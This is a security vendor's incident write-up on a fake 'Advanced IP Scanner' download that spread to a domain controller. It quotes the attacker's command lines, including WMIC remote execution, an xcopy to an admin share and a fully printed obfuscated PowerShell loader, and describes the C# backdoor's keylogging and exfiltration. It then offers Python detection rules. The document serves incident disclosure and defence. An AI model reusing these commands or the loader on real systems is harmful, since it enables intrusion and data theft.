
Executive Summary

On November 20, 2023, Blumira produced three findings that led to a Security Incident investigation regarding remote code being run on two separate XYZ Company hosts. The initial workstation host {hostname1} downloaded a malicious executable that was masked as “Advanced IP Scanner.” This file then began running automated Batch script commands and copying the behavior over to the server {DomainController2}. Via the attacker, the malicious application also began setting up a Command & Control session with an IP address hosted at CloudFlare.

Summary of incident timeline

Incident Walkthrough

Note: All IP addresses, hostnames, and usernames have been changed to protect customer data.

2023-11-20

Time: 18:57 UTC

Mitre Tactic & Technique: Discovery, T1018 – Remote System Discovery

Activity #1: TOMSMITH mistakenly downloaded malicious software on hostname1. The software masqueraded as Advanced IP Scanner in Google search results, leading the user to a fake version of the program hosted on a Cloudflare instance. The logs also show the installation of this program onto hostname1. Important artifacts created around this time are:

C:\ProgramData\Microsoft\NodejsToolsVsix\CG6oDkyFHl3R.t
C:\ProgramData\Microsoft\LogConverter\CG6oDkyFHl3R.t


Time: 18:59 UTC

Activity #2: A Blumira finding for Advanced IP Scanner was generated. While this wasn’t the legitimate version of Advanced IP Scanner, we still see value in detecting early-stage reconnaissance tooling, as correlated activity can be an early warning sign of an attack.


Time: 19:06 UTC

Mitre Tactic & Technique: Discovery, T1016 – System Network Configuration Discovery

Activity #3: Administrator runs several commands to gather information about the AD domain.

"C:\WINDOWS\system32\nslookup.exe" internaldomain.local
"C:\WINDOWS\system32\systeminfo.exe"

Time: 19:06 UTC

Mitre Tactic & Technique: Execution, T1059 – Command and Scripting Interpreter

Activity #4: When Advanced_IP_Scanner_2.5.4594.1.exe is run, we can see the LOLBAS technique mentioned in an attack here in action. The two commands that directly follow show the DLL being built and then the script being called.

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" /noconfig @"C:\Users\TOMSMITH\AppData\Local\Temp\twerdmug.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\TOMSMITH\AppData\Local\Temp\RESA392.tmp" "C:\Users\TOMSMITH\AppData\Local\Temp\vbcEF74F3B3EC042EBBFF08FC71F3636EB.TMP"

Time: 19:07 UTC

Mitre Tactic & Technique: Collection, T1074.002 – Data Staged: Remote Data Staging

Activity #5: Administrator runs the command below to copy a malicious batch file to the newly discovered domain controller.

"C:\WINDOWS\system32\xcopy.exe" c:\programdata\microsoft\LogConverter \\19.1.44.11\C$\programdata\microsoft\LogConverter /E /H /Y

Time: 19:08 UTC

Mitre Tactic & Technique: Execution, T1047 – Windows Management Instrumentation

Activity #6: From hostname1 the attacker uses WMI for remote command execution to run the newly copied code on the domain controller.

"C:\WINDOWS\System32\Wbem\WMIC.exe" /node:19.1.44.11 process call create "cmd.exe /c C:\ProgramData\Microsoft\LogConverter\Microsoft.NodejsTools.PressAnyKey.lnk"


Time: 19:08 UTC

Activity #7: A Blumira finding for WMI Remote Code Execution was generated for the previous command.


Time: 19:09 UTC on DomainController2

Mitre Tactic & Technique: Execution, T1059 – Command and Scripting Interpreter

Activity #8: Now that the attacker had a remote shell into the domain controller, they were able to run commands on the DomainController2 host. DomainController2 then runs the following PowerShell script.

C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe -windowstyle Hidden -command "Set-Item Variable:LeX 'Net.WebClient';Set-Item Variable:/8i 'C:\ProgramData\Microsoft\LogConverter\CG6oDkyFHl3R.t';ls _-*;SI Variable:TL (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{$_.Name-clike'*ets'}).Name).Invoke('N*-O*')(GV LeX -Valu));Set-Item Variable:\h ((((Get-Variable TL).Value|GM)|Where-Object{$_.Name-clike'*wn*g'}).Name);$ExecutionContext.(($ExecutionContext|GM)[6].Name)|ForEach-Object{(Get-Variable _).Value.(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{$_.Name-clike'In*'}).Name).Invoke((Get-Variable TL).Value.((Get-ChildItem Variable:/h).Value).Invoke((Variable 8i -ValueOnl)))}"

To break this down a little:

1. This part runs PowerShell with a hidden window, a tactic often used by malicious scripts to hide their activity from the user:

C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe -windowstyle Hidden

2. This creates a new variable named LeX and sets it to Net.WebClient, which is a .NET class used for making web requests.

Set-Item Variable:LeX 'Net.WebClient'

3. This sets another variable, /8i, to a specific file path.

Set-Item Variable:/8i 'C:\ProgramData\Microsoft\LogConverter\CG6oDkyFHl3R.t'

4. This lists items in the current directory whose names match the pattern _-* (an underscore followed by a hyphen).

ls _-*

5. The next part of the script uses complex PowerShell syntax to dynamically create and modify variables and their values. This includes accessing the execution context, modifying variable properties, and invoking methods. The script appears to be using reflection and other advanced techniques to dynamically invoke methods and manipulate objects. This is a common tactic in malicious scripts to evade detection and analysis.
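One way to make the breakdown above mechanical, as an added example that is not part of the original post: the Python below scans a PowerShell command line for the evasion patterns just described (hidden window, assignments through the Variable: drive, member names picked by Get-Member index or wildcard, .Invoke calls on runtime-resolved names) and pulls out the plain string literals an analyst would attach to a finding. It executes nothing from the script. The indicator names, the threshold and the benign comparison command are assumptions; the sample is the command line quoted above, collapsed to one line.

```python
"""Indicator-based triage of an obfuscated PowerShell command line.
Added example, not the write-up's own tooling. Nothing is executed; the text
is only scanned for the evasion patterns the breakdown describes."""
import re

INDICATORS = {
    # Console window hidden from the logged-on user.
    "hidden_window": re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I),
    # Variables created through the Variable: drive instead of $name = ...
    "variable_provider_setitem": re.compile(r"\b(Set-Item|SI)\s+Variable:", re.I),
    # Member picked by position from Get-Member output, e.g. (...|GM)[6].Name
    "get_member_index": re.compile(r"\|\s*(Get-Member|GM)\)\s*\[\d+\]\.Name", re.I),
    # Member picked by wildcard, e.g. Where-Object{$_.Name-clike'*wn*g'}
    "wildcard_member_name": re.compile(r"\$_\.Name\s*-c?like\s*'[^']*\*[^']*'", re.I),
    # Cmdlet looked up by pattern rather than named, e.g. 'N*-O*'
    "wildcard_cmdlet_name": re.compile(r"'[A-Za-z]\*-[A-Za-z]\*'"),
    # Methods called through .Invoke(...) on names resolved at runtime.
    "dynamic_invoke": re.compile(r"\.Invoke\(", re.I),
    # Dot-sourcing a computed expression: (.$ExecutionContext...
    "dot_source_expression": re.compile(r"\(\.\$ExecutionContext", re.I),
}
STRING_LITERAL_RE = re.compile(r"'([^']+)'")


def triage(command_line):
    """Return per-indicator hit counts, the non-wildcard string literals, and a score."""
    counts = {name: len(rx.findall(command_line)) for name, rx in INDICATORS.items()}
    literals = [s for s in STRING_LITERAL_RE.findall(command_line) if "*" not in s]
    score = sum(1 for c in counts.values() if c > 0)  # distinct indicators hit
    return {"indicators": counts, "literals": literals, "score": score}


def verdict(result, threshold=4):
    """Assumed threshold: four or more distinct indicators is treated as obfuscated."""
    return "obfuscated" if result["score"] >= threshold else "plain"


# The command line quoted in the write-up, joined onto one line.
SAMPLE_COMMAND = " ".join(r'''
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe -windowstyle Hidden -command "Set-Item Variable:LeX 'Net.WebClient';Set-Item Variable:/8i
'C:\ProgramData\Microsoft\LogConverter\CG6oDkyFHl3R.t';ls _-*;SI Variable:TL
(.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{$_.Name-clike'*ets'}).Name).Invoke('N*-O*')(GV LeX -Valu));Set-Item Variable:\h ((((Get-Variable TL).Value|GM)|Where-Object{$_.Name-clike'*wn*g'}).Name);$ExecutionContext.(($ExecutionContext|GM)[6].Name)|ForEach-Object{(Get-Variable
_).Value.(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{$_.Name-clike'In*'}).Name).Invoke((Get-Variable TL).Value.((Get-ChildItem
Variable:/h).Value).Invoke((Variable 8i -ValueOnl)))}"
'''.split())

# Constructed benign admin command for comparison.
BENIGN_COMMAND = r'''powershell.exe -NoProfile -Command "Get-Service | Where-Object {$_.Status -eq 'Running'}"'''

if __name__ == "__main__":
    for label, cmd in (("sample", SAMPLE_COMMAND), ("benign", BENIGN_COMMAND)):
        r = triage(cmd)
        print(label, verdict(r), r["score"], r["literals"])
        for name, count in r["indicators"].items():
            if count:
                print(f"  {name}: {count}")
```

The literal extraction is what gives the finding its concrete artifacts: from this command it yields only the .NET class name and the path of the staged CG6oDkyFHl3R.t file, which is the same file that xcopy pushed to the domain controller earlier in the timeline.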


Time: 19:10 UTC

Mitre Tactic & Technique: Execution, T1059 – Command and Scripting Interpreter

Activity #9: We then see a batch script file running from that same directory.

"C:\ProgramData\Microsoft\LogConverter\Microsoft.NodejsTools.PressAnyKey.exe" abnormal c:\programdata\Administrator cmd /c C:\ProgramData\Microsoft\LogConverter\LogConverter.bat

Time: 19:10 UTC

Activity #10: A Blumira finding for Batch Script Execution was generated. We do not alert on all batch script executions, just as we don’t alert on all programs being run. Someone remotely called the command line first from an unusual location to run this batch script.

We were also given a copy of both CG6oDkyFHl3R.t and LogConverter.bat by the customer. The .t file was a C# application; here is a breakdown of its key functionality:

  • Namespace and Classes: The application is contained within the namespace iVyisyGgNYMCvKq.
    • KuSyEkRq Class:
      • This class has three properties: UUID, ID, and Data. These seem to be related to identifying and storing data.
    • TrustAllCertsPolicy Class:
      • Implements the ICertificatePolicy interface and overrides the CheckValidationResult method to always return true. This trusts all SSL certificates.
    • XwOWxCEB Class:
      • Contains various DllImport statements for interacting with user32.dll and kernel32.dll.
      • Defines several static variables and methods for window management, key logging, and sending data to a remote server.
    • arXOPGDNf Class:
      • Defines methods for encrypting and decrypting byte arrays.
  • Methods
    • Main Method:
      • Calls ShowWindow to hide the console window.
      • Invokes the mDrSGqJS method with specific parameters.
    • mDrSGqJS Method:
      • Configures SSL certificate validation callback to trust all certificates.
      • Sets up parameters such as server URL, a unique identifier (cuzGRbghiiDuB), and a byte array (cRcQUEGZXJWrUs).
      • Initiates a loop to communicate with the remote server, handling various commands like “delay,” “exit,” and user input.
    • YJUBBebXRoNQCY Method:
      • Retrieves the active window’s title.
    • pmavtYHsUqft Method:
    • mTEBtfK Method:
      • Sends data to a remote server using HTTP POST requests.

An attacker designed this obfuscated program for remote control and data exfiltration. The program hides its console window, communicates with a server over HTTPS, and can execute PowerShell commands on the local machine, sending the encrypted results back to the server.


Time: 22:16 UTC

Activity #11: The malicious software masked itself as Advanced IP Scanner on DomainController2, and we updated the previously created finding with the new information.


Time: 22:53 UTC

Activity #12: Customer contacts our support team.


Time: 23:37 UTC

Activity #13: Support team begins investigation.

 


2023-11-20

Time: 01:54 UTC

Activity #14: The customer manually isolates the hosts using Blumira Agent.


Time: 14:13 UTC

Activity #15: After consulting with the customer and confirming this was an attack and not something expected, a member of the Blumira team starts the process of submitting a report for the malicious Cloudflare instance via Cloudflare’s abuse page.


Time: 15:27 UTC

Activity #16: Two files were found on hostname3 as part of an automated backup process for the Administrator profile. SentinelOne took action and blocked the file LogConverter.bat from executing.

Detection & Defense Recommendations

In this specific instance there are several different defensive recommendations from the Blumira team.

  1. Most users should not have local administrator permissions. If you, your team, or other everyday endpoint users run email clients, browsers, and other applications as a local or domain administrator, you are opening the door to many automated attacks, and privilege escalation from your account to another device or process becomes far easier.
  2. Local administrator passwords should be complex and different per workstation. If an attacker is able to discover a single local admin password, that shouldn’t mean they can plug it into a script or pass the hash and have it work on every endpoint in the environment. Solutions like Windows LAPS generate unique passwords per machine; Windows now integrates LAPS natively, eliminating the need for a separate installation, and it also works in conjunction with Entra ID.
  3. As always, I’m a huge proponent of testing your SIEM and endpoint detections whenever possible; a large number of these tests are non-invasive. We constantly test these detections in our labs as we create them and over time, but it’s important to confirm everything is working properly by doing testing of your own when possible. Freely available tools such as Atomic Red Team assist with this, and some short tests you can run are listed here.
  4. Do you know what PowerShell, WMI, batch files, and the like are being executed in your environment? Controlling the directories they run from and the accounts that execute them is very helpful in spotting anomalies.

How Blumira is Doing Better

There is no unhackable company, software, hardware, or person. I recently had a discussion on the 7-min security podcast about the expectation to be bulletproof, and how that expectation damages everyone on both sides of the business. You, as the person reading this, should not expect yourself to know everything and catch everything; it’s just not possible. What is possible is for us to grow and learn over time, and to accept that this is something we should constantly be doing. So what could we have done better in this situation?

  1. We were in the process of creating a detection based on the LOLBAS seen at 19:06 with cvtres.exe. We fast-track detections like this when they are seen in an incident, but we should already have been detecting it.
  2. Using xcopy in this manner was already on our radar, but we hadn’t prioritized it as a detection. Now that we have seen it in a confirmed attack, we have prioritized it for testing in our lab against previous customer data, to determine whether we’ve had misses before, and we hope to release it to production soon along with the detection mentioned above.
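As an added example (not Blumira's detection logic or the customer's tooling), the Python below turns the command lines from Activities #4 through #6 and the two detection gaps listed above into process-creation rules, and runs them over constructed Sysmon Event ID 1-style events built from those command lines. The hostnames, IP address and username are the page's anonymised values; the parent processes, rule names, build-tool allowlist and the two benign look-alike events are assumptions.

```python
"""Process-creation rules for the chain in this write-up (added example; not
Blumira's or the customer's detection code). Each rule is a pure function over
a Sysmon Event ID 1-style record: a dict with Host, Image, ParentImage and
CommandLine. Sample events are constructed from the command lines quoted on
the page; the parent processes and benign look-alikes are assumptions."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    technique: str  # ATT&CK technique id, as used in the timeline
    host: str
    evidence: str


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


# Rule 1: vbc/csc/cvtres reading input from a user's Temp directory. Real builds
# look identical, so the parent must not be a known build tool (assumed list).
COMPILER_RE = re.compile(r'\\(vbc|csc|cvtres)\.exe"?\s', re.I)
USER_TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
BUILD_PARENTS = {"devenv.exe", "msbuild.exe", "dotnet.exe"}
# Rule 2: xcopy/robocopy writing into a remote administrative share (\\host\C$\...).
COPY_TOOLS = {"xcopy.exe", "robocopy.exe"}
ADMIN_SHARE_RE = re.compile(r"\\\\[\w.\-]+\\[a-z]\$\\", re.I)
# Rule 3: WMIC asked to create a process on another host.
WMIC_REMOTE_RE = re.compile(r'wmic(\.exe)?"?\s+/node:\S+\s+process\s+call\s+create', re.I)
# Rule 4: on the receiving host, a shell spawned by the WMI provider host
# (WmiPrvSE.exe) that points at a script or shortcut under C:\ProgramData.
PROGRAMDATA_SCRIPT_RE = re.compile(r'C:\\ProgramData\\[^"\s]+\.(bat|cmd|lnk|ps1|vbs)\b', re.I)
SHELLS = {"cmd.exe", "powershell.exe"}


def lolbas_compile_from_temp(ev):
    cl = ev["CommandLine"]
    if (COMPILER_RE.search(cl) and USER_TEMP_RE.search(cl)
            and basename(ev["ParentImage"]) not in BUILD_PARENTS):
        return Finding("lolbas_compile_from_temp", "T1059", ev["Host"], cl)


def copy_to_admin_share(ev):
    cl = ev["CommandLine"]
    if basename(ev["Image"]) in COPY_TOOLS and ADMIN_SHARE_RE.search(cl):
        return Finding("copy_to_admin_share", "T1074.002", ev["Host"], cl)


def wmic_remote_create(ev):
    cl = ev["CommandLine"]
    if WMIC_REMOTE_RE.search(cl):
        return Finding("wmic_remote_process_create", "T1047", ev["Host"], cl)


def remote_script_from_programdata(ev):
    cl = ev["CommandLine"]
    if (basename(ev["Image"]) in SHELLS and basename(ev["ParentImage"]) == "wmiprvse.exe"
            and PROGRAMDATA_SCRIPT_RE.search(cl)):
        return Finding("remote_script_from_programdata", "T1059", ev["Host"], cl)


RULES = (lolbas_compile_from_temp, copy_to_admin_share,
         wmic_remote_create, remote_script_from_programdata)


def evaluate(events):
    """Run every rule over every event; return findings in event order."""
    findings = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit is not None:
                findings.append(hit)
    return findings


def make_event(host, image, parent, cmdline):
    return {"Host": host, "Image": image, "ParentImage": parent, "CommandLine": cmdline}


NET = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319"
# Constructed events: the first five mirror the timeline, the last two are benign.
SAMPLE_EVENTS = [
    make_event("hostname1", NET + r"\vbc.exe", r"C:\Users\TOMSMITH\Downloads\Advanced_IP_Scanner_2.5.4594.1.exe",
               '"' + NET + r'\vbc.exe" /noconfig @"C:\Users\TOMSMITH\AppData\Local\Temp\twerdmug.cmdline"'),
    make_event("hostname1", NET + r"\cvtres.exe", NET + r"\vbc.exe",
               NET + r'\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\TOMSMITH\AppData\Local\Temp\RESA392.tmp" "C:\Users\TOMSMITH\AppData\Local\Temp\vbcEF74F3B3EC042EBBFF08FC71F3636EB.TMP"'),
    make_event("hostname1", r"C:\WINDOWS\system32\xcopy.exe", r"C:\WINDOWS\system32\cmd.exe",
               r'"C:\WINDOWS\system32\xcopy.exe" c:\programdata\microsoft\LogConverter \\19.1.44.11\C$\programdata\microsoft\LogConverter /E /H /Y'),
    make_event("hostname1", r"C:\WINDOWS\System32\Wbem\WMIC.exe", r"C:\WINDOWS\system32\cmd.exe",
               r'"C:\WINDOWS\System32\Wbem\WMIC.exe" /node:19.1.44.11 process call create "cmd.exe /c C:\ProgramData\Microsoft\LogConverter\Microsoft.NodejsTools.PressAnyKey.lnk"'),
    make_event("DomainController2", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wbem\WmiPrvSE.exe",
               r"cmd.exe /c C:\ProgramData\Microsoft\LogConverter\Microsoft.NodejsTools.PressAnyKey.lnk"),
    make_event("devbox1", NET + r"\vbc.exe", r"C:\Program Files\Microsoft Visual Studio\Common7\IDE\devenv.exe",
               '"' + NET + r'\vbc.exe" /noconfig @"C:\Users\dev\AppData\Local\Temp\abc123.cmdline"'),
    make_event("hostname1", r"C:\WINDOWS\system32\xcopy.exe", r"C:\WINDOWS\system32\cmd.exe",
               r'"C:\WINDOWS\system32\xcopy.exe" C:\data D:\backup\data /E /H /Y'),
]

if __name__ == "__main__":
    for f in evaluate(SAMPLE_EVENTS):
        print(f"{f.host:18} {f.technique:10} {f.rule:32} {f.evidence[:70]}")
```

The compiler rule is the noisy one: developer workstations legitimately run vbc.exe and csc.exe against .cmdline files in Temp, which is why it keys on the parent process, and why a rule like this belongs in the lab run against historical data before it reaches production. The admin-share and WMIC rules are much quieter in most environments, and the parent-is-WmiPrvSE rule on the receiving host is what ties the remote command back to the domain controller activity in Activities #8 and #9.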

Summary

These detections are possible with either the Blumira Agent or Sysmon installed; in this case the admin was also able to quickly identify and quarantine the affected hosts with the Blumira Agent. Thanks to quick action from both teams, there was no downtime and no further remediation was needed.
